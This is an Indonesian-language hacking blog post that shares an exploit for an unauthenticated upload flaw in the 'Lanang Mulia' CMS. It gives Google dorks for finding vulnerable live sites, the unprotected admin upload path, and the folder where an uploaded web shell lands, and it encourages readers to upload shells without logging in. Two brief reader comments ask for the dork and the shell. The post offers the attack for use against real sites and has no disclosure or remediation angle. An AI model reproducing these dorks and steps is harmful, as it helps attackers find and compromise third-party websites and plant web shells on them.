kali ini ane mau share exploit yang ane dapet kemarin dari seortang teman di facebook. namanya Exploit Lanang Mulia Uploader Vulnerability. Bugnya hampir mirip dengan Bug Upload pada CMS Lokomedia. Setelah ane masuk ke dalamnya pun ternyata cms ini hampir sama dengan Lokomedia.
Oke langsung saja ane share exploitnya :
Exploit Title: Lanang Mulia Uploader Vulnerability
Google Dork:
intext:” Web By: lanangmulia.net”
inurl:showdetail.php?mod=
Untuk dork lain kembangkan sendiri, use your brain 😉
Exploit :
[localhost]/admin/upload_1.php
Jika belum di patch, disitu kalian bisa langsung upload shell kalian tanpa harus tamper data maupun login 😀
Nah, nanti shell akan terletak di
[localhost]/foto/namashell.php
Sekian tutorial kali ini, semoga bermanfaat .
Thanks to : BarrabravaZ
dorknya??
shellnya mana?